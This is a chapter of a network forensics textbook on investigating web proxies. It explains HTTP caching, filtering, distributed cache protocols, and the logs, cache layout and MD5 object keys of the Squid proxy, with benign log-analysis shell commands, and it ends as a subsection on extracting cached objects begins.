Chapter 10. Web Proxies

“The hardest thing for people to grasp about the Web is that it has no center; any computer (or node, in mathematical terms) can link to any other computer directly, without having to go through a central connection point. They just need to know the rules for communicating.”

—Mark Fischetti, editor of Scientific American1

1. Larry Greenemeier, “Remembering the Day the World Wide Web Was Born,” Scientific American, March 2009, http://www.scientificamerican.com/article.cfm?id=day-the-web-was-born.

It’s a port-80 world out there (and, to a lesser extent, port 443 as well). As of 2009, web traffic made up approximately 52% of all Internet traffic, and was growing at a rate of 24.76% per year.2

2. Craig Labovitz, “Internet Traffic and Content Consolidation,” March 2010, http://www.ietf.org/proceedings/77/slides/plenaryt-4.pdf.

As a result, firewalls that filter traffic based on Layer 3 and 4 protocol information, such as IP addresses and TCP ports, are no longer sufficient for protecting enterprise perimeters. The use of “web proxies” and “web application gateways,” which often include highly specialized Layer 7-aware firewall capabilities designed to inspect and filter web traffic, has exploded.

Web proxying and caching have become increasingly popular for both filtering traffic and speeding up requests. Even consumer ISPs have latched onto the idea (sometimes using similar techniques to insert ads into pages as they are downloaded).3

3. Sarah Lai Stirland, “In Test, Canadian ISP Splices Itself Into Google Homepage | Threat Level | Wired.com,” Wired.com, December 10, 2007, http://blog.wired.com/27bstroke6/2007/12/canadian-isps-p.html.

Regardless of whether security was a consideration during the original configuration, forensic investigators can take advantage of the granular logs and caches typically retained by web proxies. The rise of content distribution systems and distributed web caches further increases the need for forensic analysts to collect web content from local caches near the target of investigation, since web content is often modified for specific enterprises, geographic regions, device types, or even individual web clients.

10.1 Why Investigate Web Proxies?

Web proxy and cache servers can be gold mines for forensic analysts. A web proxy can contain the web browsing history of an entire organization, all in one place. When placed at the perimeter of an organization, a web proxy often contains the history of all HTTP or HTTPS traffic, including blogs, instant messaging, and web-based email such as Gmail and Yahoo! accounts. Web caching servers may also contain copies of the pages themselves, for a limited time.

This is great for forensic analysts. Investigators can examine web browsing histories for everyone in an organization all at once. Moreover, it’s possible to reconstruct web pages from the cache. Too often, investigators simply visit web sites in order to see what they are. This has some serious drawbacks: first, there is no guarantee you’re seeing what the end-user saw earlier and, second, your surfing now appears in the destination server’s activity logs. If the owner of the server is an attacker or suspect, you may well have just tipped them off. It’s much better to first examine the web cache to see what you can find stored locally.

Web proxies evolved and matured for two general reasons: performance and security. There are many types of web proxies. Below are some simple examples (there is a wide spectrum of products that incorporate different aspects of each of these):

Caching proxy—Stores previously used pages to speed up performance.

Content filter—Inspects the content of web traffic and filters based on keywords, presence of malware, or other factors.

TLS/SSL proxy—Intercepts web traffic at the session layer to inspect the content of TLS/SSL-encrypted web traffic.

Anonymizing proxy—Acts as an intermediary to protect the identities of web surfers.

Reverse proxy—Provides content inspection and filtering of inbound web requests from the Internet to the web server.

Nowadays, web proxies are commonly set up to process all outbound web requests from within organizations to the Internet (sometimes referred to as a “forward proxy”). In this setup, the web proxy is often configured to provide caching, content inspection, and filtering of both outbound requests and inbound replies. This has a number of benefits. The web proxy can identify and filter out suspicious or inappropriate web sites and content. Web proxies also cache commonly used pages, which improves performance by removing the need for commonly accessed external content to be fetched anew every time it is requested. In much the same way as individual web browsers cache content to improve performance for a single client, web proxies cache content for use across the enterprise.

Reverse web proxies can be useful as well. Often, they include logs that allow investigators to identify suspicious requests and source IP addresses associated with web-based attacks against the protected server.

Web proxies are typically involved in investigations for one of several reasons:

• A user on the internal network is suspected of violating web browsing policy.

• An internal system has been compromised or may have downloaded malicious content via the web.

• There is concern that proprietary data may have been exfiltrated via the web.

• A web server protected by a reverse web proxy is under attack or has been hacked.

• The web proxy itself has been hacked (rare).

Throughout this chapter, we focus on analyzing “forward” web proxies, as they are commonly used in organizations. Many of the forensic techniques used to analyze forward web proxies can also be applied to other types of web proxies in different settings (with the special exception of anonymizing proxies, since these are typically designed to retain very little or no information about the endpoints).

10.2 Web Proxy Functionality

Over time, web proxies have evolved standard functions, including:

Caching—Locally storing web objects for limited amounts of time and serving them in response to client web requests to improve performance.

URI Filtering—Filtering web requests from clients in real-time according to a blacklist, whitelist, keywords, or other methods.

Content Filtering—Dynamically reconstructing and filtering content of web requests and responses based on keywords, antivirus scan results, or other methods.

Distributed Caching—Caching web pages in a distributed hierarchy consisting of multiple caching web proxies in order to provide locally customized web content, serve advertisements, and improve performance.

We discuss each of these in turn.

10.2.1 Caching

Caching is a way of reusing data to reduce bandwidth use and load on web servers, and speed up web application performance from the end-user perspective. The web is designed as a network-based client-server model. In the simplest case, each web client request would be sent directly to the web server, which would then process the request and return data directly to the web client.

Of course, most web servers host a lot of static data that doesn’t change very often. Individual web clients often make requests for data that they have requested before. Organizations may have many web clients on their internal network making requests for data that has already been retrieved by another internal web client. Over time, the Internet community has evolved and standardized mechanisms for making web usage far more efficient by caching web server data locally and in distributed cache proxies.

Forensic investigators examining hard drives know that web pages are often cached locally by web browsers themselves, and can be retrieved through standard hard drive analysis techniques. Network forensic investigators should also be aware that web pages are often cached at the perimeters of organizations, as well as by ISPs and distributed cache proxies, and may be retrieved through analysis of web proxy servers. Client web activity may also be logged in these locations.

The HTTP protocol includes built-in mechanisms to facilitate caching that have matured over time. According to RFC 2616 (“Hypertext Transfer Protocol—HTTP/1.1”), “The goal of caching in HTTP/1.1 is to eliminate the need to send requests in many cases, and to eliminate the need to send full responses in many other cases. The former reduces the number of network round-trips required for many operations; we use an ‘expiration’ mechanism for this purpose.... The latter reduces network bandwidth requirements; we use a ‘validation’ mechanism for this purpose.”4

4. R. Fielding, “RFC 2616—Hypertext Transfer Protocol—HTTP/1.1,” IETF, June 1999, http://www.rfc-editor.org/rfc/rfc2616.txt.

Expiration and validation mechanisms are important for forensic investigators to understand because they can indicate, among other things:

• How recently a cached web object was retrieved from the server

• Whether a web object is likely to exist in the web proxy cache

• Whether a cached version of a web object was actually viewed by a specific web client

10.2.1.1 Expiration

The HTTP protocol is designed to reduce the need for web clients and proxies to make requests of web servers by providing an “expiration model” by which web servers may indicate the length of time that a page is “fresh.” While an object is “fresh,” caching web proxies may serve cached copies of the page to web clients instead of making a new request to the origin web server. This can dramatically reduce the amount of bandwidth used by an organization, and the end-user typically receives the locally cached response far more quickly than a response that must be retrieved from a remote network. When the expiration time of a web object has passed, the page is considered “stale.”

The expiration model is typically implemented through one of two mechanisms:

Expires header—The “Expires” header lists the date and time after which the object will be considered stale. Although this is a straightforward mechanism for indicating page expiration, implementation can be tricky because the client and server dates and times must be synchronized in order for this to work as designed.

Cache-Control—As of HTTP/1.1, the “Cache-Control” field supports granular specifications for caching, including a “max-age” directive that allows the web server to specify the length of time for which a response is valid. The max-age directive is defined as a number of seconds after receipt for which the response is valid, so it does not require that the clocks of the web server and the caching proxy or local system be synchronized.
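One quick way to observe these mechanisms is to request only the headers of a web object with curl. This is just a sketch (the URL is a placeholder), and the exact headers returned depend entirely on the server:

$ curl -sI http://www.example.com/index.html

In the response, an Expires header gives an absolute date after which the object is stale, while a Cache-Control header such as “Cache-Control: max-age=3600” indicates that caches may treat the object as fresh for 3,600 seconds (one hour) after receipt.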

10.2.1.2 Validation

The “validation model,” as defined by RFC 2616, allows caching web proxies and web clients to make requests of the origin web server to determine whether locally cached copies of web objects may still be used. While the proxy and/or local client still needs to contact the server in this case, the server may not need to send a full response, again improving web application performance and reducing bandwidth and load on central servers.

In order to support validation, web servers generate a “cache validator,” which they attach to each response. Web proxies and clients then provide the cache validator in subsequent requests, and if the web server responds that the object is still “valid” (i.e., using a 304 “Not Modified” HTTP status code), then the locally cached copy is used.

Common cache validators include:

Last-Modified header—The “Last-Modified” HTTP header is used as a simple cache validation mechanism based on an absolute date. The web proxy/client sends the server the most recent “Last-Modified” header, and if the object has not been modified since that date, it is considered valid.

Entity Tag (ETag)—An ETag is a unique value assigned by the web server to a web object located at a specific URI. The mechanism for assigning an ETag value is not specified by a standard and varies depending on the web server. Often, the ETag is based on a cryptographic hash of the web object, such as an MD5sum, which by definition is changed whenever the web object is modified. ETags are sometimes also generated from the last modified date and time, a random number, or a revision number. “Strong” ETag values indicate that the cached web object is bit-for-bit identical to the copy on the server, while “weak” ETag values indicate that the cached web object is semantically equivalent, although it may not be an exact bit-for-bit copy.
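To see the validation model in action, you can replay a cached object’s validators back to the server as a conditional request using curl. This is only a sketch; the URL, ETag value, and date below are hypothetical placeholders:

$ curl -sI -H 'If-None-Match: "abc123"' \
       -H 'If-Modified-Since: Sat, 01 Jan 2011 00:00:00 GMT' \
       http://www.example.com/logo.png

If the server still considers the cached copy valid, it should respond with a “304 Not Modified” status and no message body; otherwise it returns the full, updated object.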

10.2.2 URI Filtering

In many organizations, web proxies are set up in order to restrict and log web surfing activity. Quite often, enterprises limit web requests to a list of known “good” web sites (“whitelisting”) or prevent users from visiting known “bad” web sites (“blacklisting”). This is generally done in order to comply with acceptable use policies, preserve bandwidth, or improve employee productivity.

The process of maintaining whitelists is fairly straightforward, but in many organizations employees need to access a wide range of web sites in order to do their jobs, and so restricting web surfing activity to a whitelist is not practical. On the flip side, maintaining blacklists can be quite complex, since it requires that administrators maintain long and constantly changing lists of known “bad” web sites. However, blacklists provide more flexibility and there are published and commercially available blacklists that can ease local administrators’ burdens. URI filtering can also be conducted based on keywords present in the URI.

HR violations, including inappropriate web surfing, are among the most common reasons for network forensic investigations. As a result, forensic investigators may often be called upon to review web activity access logs and provide recommendations for implementing blacklists/whitelists.

Tools such as squidGuard allow administrators to incorporate blacklist/whitelist technology into web proxies.
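Squid itself can also enforce a simple blacklist using its built-in ACL syntax. The following squid.conf excerpt is only a sketch; the file path is hypothetical, and the referenced file would contain one destination domain per line:

# squid.conf excerpt: deny requests to any domain listed in the blacklist file
acl blocked_sites dstdomain "/etc/squid/blacklist.txt"
http_access deny blocked_sites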

10.2.3 Content Filtering

As the web becomes more dynamic and complex, transparent web proxies are increasingly used to filter web content. This is especially important because over the past decade, client-side attacks have risen to epidemic proportions, and a large number of system compromises occur through the web.

Content filters are often used to dynamically scan web objects for viruses and malware. In addition, they can filter web responses for inappropriate content based on content keywords or tags in HTTP metadata. Content filters can also be used to filter outbound web traffic, such as HTTP POSTs in order to detect proprietary data leaks or exposure of confidential data (such as Social Security numbers).

10.2.4 Distributed Caching

Increasingly, web providers are relying on distributed hierarchies of caching web proxies to provide web content to clients. Distributed web caching has many benefits for performance, profitability, and functionality. Using a distributed caching system, web providers can reduce the load on central servers, improve performance by storing web content closer to the endpoints, dynamically serve advertisements, and customize web pages based on geographic location or user interests.

The two most commonly used protocols underlying distributed web caches are Internet Cache Protocol and Internet Content Adaptation Protocol.

10.2.4.1 Internet Cache Protocol (ICP)

The Internet Cache Protocol (ICP) is a mechanism for communication between web cache servers in a distributed web cache hierarchy.5 Developed in the mid-to-late 1990s, the purpose of ICP was to further capitalize on the performance gains resulting from web caches by allowing networks of web cache servers to communicate and request cached web content from “parent” and “sibling” web caches. ICP is typically transported over UDP, since requests and responses must occur extremely quickly in order to be useful.6

5. D. Wessels and K. Claffy, “Internet Cache Protocol (ICP), version 2,” IETF, September 1997, http://icp.ircache.net/rfc2186.txt.

6. D. Wessels and K. Claffy, “Application of Internet Cache Protocol (ICP), version 2,” IETF, September 1997, http://icp.ircache.net/rfc2187.txt.

ICP is supported by Squid and the BlueCoat ProxySG, among other popular web proxies.7

7. D. Wessels, “ICP—Internet Cache Protocol,” June 16, 2003, http://icp.ircache.net/.

10.2.4.2 Internet Content Adaptation Protocol (ICAP)

The Internet Content Adaptation Protocol (ICAP) is designed to support distributed cache proxies which can transparently filter and modify requests and responses. ICAP is used to translate web pages into local languages, dynamically insert advertisements into web pages, scan web objects for viruses and malware, censor web responses, and filter web requests. As described in RFC 3507, “ICAP clients ... pass HTTP messages to ICAP servers for some sort of transformation or other processing (‘adaptation’). The server executes its transformation service on messages and sends back responses to the client, usually with modified messages. The adapted messages may be either HTTP requests or HTTP responses.”8

8. J. Elson and A. Cerpa, “RFC 3507—Internet Content Adaptation Protocol (ICAP),” IETF, April 2003, http://rfc-editor.org/rfc/rfc3507.txt.

ICAP reduces the load on central servers, allowing content providers to distribute resource-intensive operations across multiple servers. ICAP also enables content providers, ISPs, and local enterprises to more easily customize web content for local use, and selectively cache customized content “closer” to endpoints, realizing performance improvements.

ICAP, and similar protocols (such as the Open Pluggable Edge Services [OPES]9), have enormous implications for practitioners of web forensics. It is simply no longer the case that a forensic analyst can actively visit a URL and expect to receive the same data that an end-user viewed at an earlier date, with a different device, or from a different network location. To recover the best possible evidence, it is always best to retrieve cached web data as close as possible to the target of investigation. For example, if a cached web page is not available on a local hard drive, the next best option may be the enterprise’s caching web proxy, followed by the local ISP’s caching web proxy.

9. S. Floyd and L. Daigle, “RFC 3238—IAB Architectural and Policy Considerations for Open Pluggable Edge Services,” IETF, January 2002, http://rfc-editor.org/rfc/rfc3238.txt.

10.3 Evidence

Web proxies tend to include substantially more persistent storage than less specialized firewalls. They are often marketed as providing “visibility” into web surfing behaviors and, as a result, store detailed web access logs, and may even provide reports categorizing user web traffic by type (e.g., “adult,” “gambling,” “sports,” “IT,” or “hacking”).

Many web proxies are distributed as software platforms to be installed on top of general-purpose operating systems (such as the open-source Squid web proxy). When distributed as a standalone appliance, web proxies tend to include internal hard drives and RAM comparable to the standard enterprise server models on the market. Unlike more generic firewalls, standalone web proxy appliances typically do not involve specialized hardware such as chips that implement TCP; web protocols are too complex for hardware implementation to be widely available. Furthermore, the latency introduced over a WAN typically far exceeds the minor latency introduced by a web proxy at the enterprise perimeter. As a result, even commercial web proxies sold as standalone appliances are commonly built using enterprise-grade commodity hardware.

10.3.1 Types of Evidence

This section lists the types of evidence that you may find stored on web proxies, categorized by expected level of volatility.

10.3.1.1 Persistent

• History of all HTTP or HTTPS traffic, including blogs, IM, web mail, etc. Volatility varies based on storage space, level of web activity, and configuration options. Web access logs tend to be stored on disk for significant periods of time. Often, system administrators do not realize the length of time or granularity of the data that is cached, and years’ worth of web history can accumulate without notice.

• Blocked web traffic attempts

• Summarized user activity reports

• Web proxy configuration files

10.3.1.2 Volatile

• Cached content of web traffic stored in RAM.

• Cached content of web traffic stored on disk. Although evidence stored to disk is generally much less volatile than data stored in RAM, cached web content is designed to be removed from disk storage as needed. Web cache content tends to be highly volatile, even when it is written to disk, and it may be swapped out quickly due to space considerations. In some cases it may only remain on disk for hours, minutes, or even seconds. Volatility varies based on storage space, level of web activity, and configuration options.

• Authentication information for web sites.

10.3.1.3 Off-System

Web proxies may be configured to send system access logs, web surfing histories, and other records to a central log server. (This generally does not include cached content, which tends to take up a large amount of disk space.) In some cases, large organizations may have a fleet of web proxies managed via a central console, with centralized logging and reporting.

10.3.2 Obtaining Evidence

Web proxies often run on top of general-purpose operating systems, or versions of general-purpose operating systems that have been customized by a vendor. As a result, in many cases, the access options are similar to those of any general-purpose operating system, with the common addition of a web and/or proprietary management interface.

As forensic investigators, you may have the ability to collect:

• Log files stored on the web proxy server or a logging server

• Web cache files stored on the web proxy server

• Reports from tools built into the web proxy server

Given the wide range of web proxies in production use, it is common for forensic investigators to be challenged with an unfamiliar product. Be up-front when you encounter a new product and do not hesitate to rely on local system administrators and/or product vendors for product-specific guidance when needed. Often, network forensic investigators work very closely with network and system administrators to locate evidence and ensure the stability of production systems during evidence collection and preservation.

Whenever possible, it is best to preserve the raw log files and web cache for later analysis. These may not always be easily accessible, depending on the product and the local system configuration. Some commercial products include a built-in web or proprietary interface, which generates reports based on web proxy log data. If this is your best source of evidence, by all means, leverage it.

10.4 Squid

Let’s take a closer look at a popular proxy server and web cache tool, Squid. Squid is an open-source web proxy, originally funded by a grant from the National Science Foundation,10 and currently released as free software under the GNU GPL. It is used in commercial organizations, universities, government, and many other environments to reduce bandwidth usage, improve web surfing performance, filter traffic, protect end-users, and log web surfing activity.

10. “IRCache Home,” 1999, http://www.ircache.net/.

From a forensic perspective, there are three important components of Squid:

• Configuration: Squid is configured using a file that is by default called “squid.conf.” Other configuration files may be included by reference.

• Logfiles: Squid is capable of storing several types of logfiles, including access.log (a record of web access history), squid.out (maintains startup times and fatal errors), cache.log (program debugging and error messages), store.log (a list of all objects stored to disk or removed), and useragent.log (information about client browsers).

• Cache: Squid also stores copies of web objects themselves, for a limited time. Typically, the cache is stored in /var/spool/squid/.

10.4.1 Squid Configuration

The Squid web proxy configuration file is highly customizable, and includes a wide range of options divided into categories. These include authentication options, access control lists, HTTP options, ICP options, disk and memory cache configuration and tuning, logfile formatting, and more.11

11. “Squid Configuration Devices,” Squid-Cache, June 5, 2011, http://www.squid-cache.org/Doc/config/.

The Squid configuration file(s) can help forensic investigators determine, among other things:

• Which clients are allowed to browse the Internet or specific web sites

• What traffic is processed by the web proxy

• What restrictions exist for user web access

• How easily the web proxy can be circumvented

• What types of objects may exist in the cache (both on disk and in memory)

• The location of the cache and log files

• The storage format of the disk cache

• How long objects may be stored in the cache, and what algorithms are used to purge data

• What data is stored in the log files
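As a sketch of what to look for, the following squid.conf directives are among the most forensically relevant (the values shown are illustrative defaults; real deployments will differ):

# port on which the proxy accepts client requests
http_port 3128
# disk cache storage scheme, location, size (in MB), and first/second-level directory counts
cache_dir ufs /var/spool/squid 100 16 256
# amount of RAM devoted to the in-memory object cache
cache_mem 8 MB
# low and high water marks (percent full) that drive cache replacement
cache_swap_low 90
cache_swap_high 95
# location and format of the web access log
access_log /var/log/squid/access.log squid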

In addition, investigators can modify the Squid configuration file in order to collect more evidence in the future. For example, investigators may wish to add details to the web proxy access logs or increase the size of the cache on disk.

10.4.2 Squid Access Logfile

Squid’s “access” logfile is extremely important for forensic investigators and network administrators alike. The access logfile keeps a history of client web requests. Although the contents are highly customizable, by default Squid’s “native” access logfile format is as follows:12

12. “Features/LogFormat—Squid Web Proxy Wiki,” June 10, 2010, http://wiki.squid-cache.org/Features/LogFormat.

time elapsed remotehost code/status bytes method URL rfc931 peerstatus/peerhost type

Investigators can use the “native” Squid access logfile to retrieve a list of clients, corresponding web requests, the date and time of each request, the HTTP status code, and the number of bytes downloaded (as well as the Squid status code, which indicates whether or not the object was current and in the local cache). Note that by default the time is printed in UNIX epoch time (seconds since January 1, 1970, 00:00:00 UTC).
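To make the field layout concrete, here is a hypothetical line in the native format (the client address, URL, and retrieval details are illustrative only):

1239739126.845    127 192.168.1.170 TCP_MISS/200 48992 GET http://lolcats.com/images/u/08/22/lolcatsdotcomvz4o71odbkla2v24.jpg - DIRECT/203.0.113.80 image/jpeg

Reading left to right: the request completed at epoch time 1239739126.845 and took 127 milliseconds; the client 192.168.1.170 requested the URL shown; the object was not in the cache (TCP_MISS) and was fetched from the origin server with an HTTP 200 response; 48,992 bytes were delivered; and the content type was image/jpeg.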

Figure 10-1 shows an example of Squid’s access log file, configured to use Squid’s native log format.

image

Figure 10-1 Squid’s access log (native format).

10.4.3 Squid Cache

Squid stores copies of web objects locally, and provides these cached copies in response to subsequent requests in order to improve performance. The Squid disk cache is a hierarchy of files stored locally on the caching web proxy that contain the cached web objects.

Squid selects web objects for disk storage based on web server directives (such as Cache-Control values), HTTP status codes, and local web proxy configuration. Normally, web server responses with the following HTTP status codes may be cached:13

13. “SquidFaq/InnerWorkings—Squid Web Proxy Wiki,” April 8, 2009, http://wiki.squid-cache.org/SquidFaq/InnerWorkings.

200 OK
203 Non-Authoritative Information
300 Multiple Choices
301 Moved Permanently
410 Gone

10.4.3.1 Disk Cache

Each Squid proxy can store cached objects in one or more cache directories. Typically, there is only one cache directory on each partition, although this is customizable (see the “cache_dir” directive in the Squid configuration file). Squid supports a variety of cache directory storage formats. The traditional, default format is “ufs,” which we will use as the basis for the remainder of this chapter.14

14. “7.1 The cache_dir Directive: Disk Cache Basics,” Etutorials, 2011, http://etutorials.org/Server+Administration/Squid.+The+definitive+guide/Chapter+7.+Disk+Cache+Basics/7.1+The+cache_dir+Directive/.

The length of time that cached web objects are stored on disk depends on Squid’s specific configuration and usage. Squid uses a “least-recently-used” (LRU) algorithm to select objects from the cache for removal and replacement. The system administrator can set low and high marks for disk usage (by default these are 90% and 95% respectively), and a routine process runs by default once per second to clear disk space as needed. Each time a cache object is accessed, the associated metadata is updated with a corresponding value indicating the last accessed time. Based on this algorithm, higher web proxy use tends to lead to web objects being stored for a shorter time in the disk cache. According to the Squid web proxy documentation, “Ideally, your cache will have an LRU age value in the range of at least 3 days. If the LRU age is lower than 3 days, then your cache is probably not big enough to handle the volume of requests it receives.”15

15. “SquidFaq/InnerWorkings—Squid Web Proxy Wiki,” April 8, 2009, http://wiki.squid-cache.org/SquidFaq/InnerWorkings.

10.4.3.2 swap.state

The swap.state file is Squid’s database, which contains a record of every object that has been added to or removed from the cache.16 This is a binary file that Squid reads on startup to rebuild its indexes in memory in order to facilitate object retrieval. (Forensic investigators may also be able to retrieve cache index information from system RAM.) If the swap.state file is deleted while Squid isn’t running, Squid will actually recreate it the next time it starts up. By default, the swap.state file is stored in the top level of the corresponding cache directory.17

16. “ProgrammingGuide/FileFormats—Squid Web Proxy Wiki,” May 18, 2008, http://wiki.squid-cache.org/ProgrammingGuide/FileFormats.

17. “13.6 swap.state: Log Files,” Etutorials, 2011, http://etutorials.org/Server+Administration/Squid.+The+definitive+guide/Chapter+13.+Log+Files/13.6+swap.state/.

10.4.3.3 Keys

Squid assigns a database key to each cached web object. The key is a cryptographic hash (currently a 128-bit MD5 sum) of the URL prepended with an 8-bit code that corresponds with the HTTP method used to request it.

Supported HTTP methods and corresponding numbers are as follows:18

18. Martin Hamilton, “Cache Digest Specification—Version 5,” December 1998, http://www.squid-cache.org/CacheDigest/cache-digest-v5.txt.

METHOD    Hex Value
  GET       0x01
  POST      0x02
  PUT       0x03
  HEAD      0x04
  CONNECT   0x05
  TRACE     0x06
  PURGE     0x07

As an example, here is the calculation for the key of the web site “http://lmgsecurity.com/” retrieved using an HTTP GET request (the top line is ASCII, and the line below is hexadecimal):

GET h  t  t  p  :  /  /  l  m  g  s  e  c  u  r  i  t  y  .  c  o  m  /
01  68 74 74 70 3A 2F 2F 6C 6D 67 73 65 63 75 72 69 74 79 2E 63 6F 6D 2F

Key (MD5 digest): 7bb31ba8a860e88d4e712dc81f7e9385
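Assuming the layout described above (a single method byte followed by the URL), you can reproduce this calculation with standard shell tools:

$ printf '\x01http://lmgsecurity.com/' | md5sum

The digest printed should match the key shown above.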

You will find the key in Squid’s swap.state and store.log files, as well as in the metadata of each cached web object. Note that Squid differentiates between public and private keys; in this context, the private key is associated only with requests from a single client, whereas web objects marked with a public key may be served to any client. This allows Squid to effectively handle cached objects that may be protected by authentication or contain private data that should only be viewed by a specific client.19

19. “SquidFaq/InnerWorkings—Squid Web Proxy Wiki,” Squid-Cache, 2011, http://wiki.squid-cache.org/SquidFaq/InnerWorkings#What_are_private_and_public_keys.3F.

10.4.3.4 Memory Cache

Since it is faster to read pages from memory than from disk, Squid also maintains a limited subset of cached pages in memory. As a result, forensic investigators may be able to retrieve a limited number of volatile cached web objects from the web proxy’s RAM. The amount of RAM dedicated to this purpose is configurable using the “cache_mem” line in the Squid configuration file.20

20. “Appendix B.: The Memory Cache,” Etutorials, 2011, http://etutorials.org/Server+Administration/Squid.+The+definitive+guide/Appendix+B.+The+Memory+Cache/.

10.5 Web Proxy Analysis

Forensic analysis of web proxies is a new art. Web proxy access logs contain records of browsing histories, often for an entire organization. This can allow an investigator to build very detailed profiles of user activities and interests and correlate activity across a large population of end-users. Access log data takes up very little space and is easy to store. Organizations may store years’ worth of web proxy access logs, without even realizing it. These logs can be analyzed using general-purpose event log analysis tools or with specialized open-source and commercial tools.

On the flip side, extracting objects from web proxy caches is challenging, and the evidence is very volatile. Cache formats are not well documented (in proprietary web proxies, they are deliberately unpublished). Due to the large disk space necessary to cache web objects, they are typically not retained on disk for very long, although this varies depending on the web proxy configuration, capacity, and network activity. Not many tools exist to facilitate extraction of cached objects, although that is beginning to change.

In this section, we review common tools available for analyzing web proxy log data, and then show you an example of web proxy cache analysis.

10.5.1 Web Proxy Log Analysis Tools

Forensic investigators can analyze most web proxy logs using common log analysis tools such as Linux command-line tools, Splunk, and others. There are also many open-source and commercially available tools that exist specifically to analyze and produce reports for web proxy log data. These include Internet Access Monitor, Blue Coat Reporter, squidview, and SARG, among others.

10.5.1.1 Internet Access Monitor

Internet Access Monitor21 is a commercial tool by Red Line Software. It accepts logs from a wide variety of web proxy servers, including Squid, Microsoft’s ISA, Novell BorderManager, and others.

21. “Internet Access Monitor,” Red Line Software, 2011, http://www.redline-software.com/eng/products/iam.

10.5.1.2 Blue Coat Reporter

The Blue Coat Reporter is another commercial tool, designed specifically to produce visual reports for Blue Coat products, such as the ProxySG, WebFilter, ProxyClient, and ProxyAV.

10.5.1.3 Squidview

Squidview is an open-source, interactive Squid access log analysis tool.22 You can use it to analyze saved log files or to view the access log in real-time (squidview will show activity updates every 3 seconds by default). Figure 10-2 shows an example of squidview use.

22. “squidview,” May 30, 2011, http://www.rillion.net/squidview/.

image

Figure 10-2 Squidview.

10.5.1.4 SARG

The Squid Analysis Report Generator (SARG) is a web-based Squid analysis tool that allows you to browse visual reports of user activity based on Squid’s access log (SARG also supports log formats from Microsoft ISA and Novell Border Manager).23 SARG can also supplement reports with additional information from web filtering logs, such as those generated by squidGuard. Figure 10-3 shows an example of a SARG activity graph for one client during a set time period.

23. “SARG,” 2011, http://sarg.sourceforge.net/sarg.php.

image

Figure 10-3 A screenshot of SARG, showing the browsing history of 192.168.1.170.

10.5.1.5 Splunk

You can also use Splunk to analyze web proxy access. One nice thing about using Splunk for this purpose is that it automatically translates the UNIX timestamps from common logfiles such as Squid’s access.log into human-readable format. It also allows you to graphically examine a client’s web surfing history and filter on any keyword in the logs (such as an IP address or URI). Figure 10-4 shows a simple example in which Splunk is used to display Squid’s access logfile.

image

Figure 10-4 A simple example in which Splunk is used to display Squid’s access log.

Please see Chapter 8, “Event Log Aggregation, Correlation, and Analysis,” for more details about Splunk.

10.5.1.6 Shell

Linux command-line tools such as grep, sort, and awk can be very helpful when analyzing Squid’s access.log file.

• You can extract logs relating to a specific IP address using “grep”:

$ grep -E '192\.168\.1\.4|192\.168\.10\.42' access.log

This command extracts all lines that contain EITHER “192.168.1.4” or “192.168.10.42” from the file access.log. It is often handy for investigators to see timestamps in human-readable format, rather than solely UNIX timestamps.

• You can convert UNIX timestamps to human-readable format using the following command:

$ date -d @1239739126.845
Tue Apr 14 13:58:46 MDT 2009

• Here’s one way to append a column of human-readable dates before the UNIX timestamps, and save the modified file as access-humandate.log:

$ while read line; do
    unixdate=`echo $line | awk '{print $1}'`
    humandate=`date -d @$unixdate`
    echo $humandate $line
  done < access.log > access-humandate.log

• You can also create a file that contains the bare minimal information: the human-readable dates, source IP address, and the associated URIs. This example operates on the access-humandate.log file created in the previous step:

$ awk '{printf "%s %s %s %s %s %s - %s - %s\n", $1, $2, $3, $4, $5, $6, $9, $13}' \
    access-humandate.log > basic-access.log
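• You can also quickly summarize which clients generated the most requests. In the native format, the third field is the client address, so a simple pipeline (a sketch, assuming the default field order) produces a ranked list:

$ awk '{print $3}' access.log | sort | uniq -c | sort -rn | head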

10.5.2 Example: Dissecting a Squid Disk Cache

If you simply list the directory contents of a ufs Squid disk cache, here is what you will see:

$ ls
00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F swap.state

Within each of those subdirectories are files such as these:

$ ls 00/
00  10  20  30  40  50  60  70  80  90  A0  B0  C0  D0  E0  F0
01  11  21  31  41  51  61  71  81  91  A1  B1  C1  D1  E1  F1
02  12  22  32  42  52  62  72  82  92  A2  B2  C2  D2  E2  F2
03  13  23  33  43  53  63  73  83  93  A3  B3  C3  D3  E3  F3
04  14  24  34  44  54  64  74  84  94  A4  B4  C4  D4  E4  F4
05  15  25  35  45  55  65  75  85  95  A5  B5  C5  D5  E5  F5
06  16  26  36  46  56  66  76  86  96  A6  B6  C6  D6  E6  F6
07  17  27  37  47  57  67  77  87  97  A7  B7  C7  D7  E7  F7
08  18  28  38  48  58  68  78  88  98  A8  B8  C8  D8  E8  F8
09  19  29  39  49  59  69  79  89  99  A9  B9  C9  D9  E9  F9
0A  1A  2A  3A  4A  5A  6A  7A  8A  9A  AA  BA  CA  DA  EA  FA
0B  1B  2B  3B  4B  5B  6B  7B  8B  9B  AB  BB  CB  DB  EB  FB
0C  1C  2C  3C  4C  5C  6C  7C  8C  9C  AC  BC  CC  DC  EC  FC
0D  1D  2D  3D  4D  5D  6D  7D  8D  9D  AD  BD  CD  DD  ED  FD
0E  1E  2E  3E  4E  5E  6E  7E  8E  9E  AE  BE  CE  DE  EE  FE
0F  1F  2F  3F  4F  5F  6F  7F  8F  9F  AF  BF  CF  DF  EF  FF

And each of those subdirectories contains files such as these:

$ ls 00/00/
00000001  0000002C  00000058  00000083  000000AE  000000DA
00000002  0000002D  00000059  00000084  000000AF  000000DB
00000003  0000002E  0000005A  00000085  000000B0  000000DC
00000004  0000002F  0000005B  00000086  000000B1  000000DD
00000005  00000030  0000005C  00000087  000000B2  000000DE
00000006  00000031  0000005D  00000088  000000B3  000000DF
00000007  00000032  0000005E  00000089  000000B4  000000E0
00000008  00000033  0000005F  0000008A  000000B5  000000E1
00000009  00000034  00000060  0000008B  000000B6  000000E2
0000000A  00000035  00000061  0000008C  000000B7  000000E3
0000000B  00000036  00000062  0000008D  000000B8  000000E4
...

Finally, each of those eight-character files contains—yes!—the object actually cached by Squid, along with Squid metadata and HTTP headers. Each disk file includes a Squid header with metadata, followed by the HTTP response (headers and body). The Squid metadata includes the URI requested as well as the database key and other information.

10.5.2.1 Extracting a Cached Web Object

To extract a web object from the Squid cache, first locate the cache file of interest. You can do this in a variety of ways, depending on the information you have available. For example, if you have identified a URI of interest from Squid’s access log file, you can use standard UNIX/Linux shell commands to list files in the Squid cache directory that contain that URI. (To make your search more specific, you can calculate the key using the HTTP method and URL listed in the access log, and search for web objects that contain the key.)
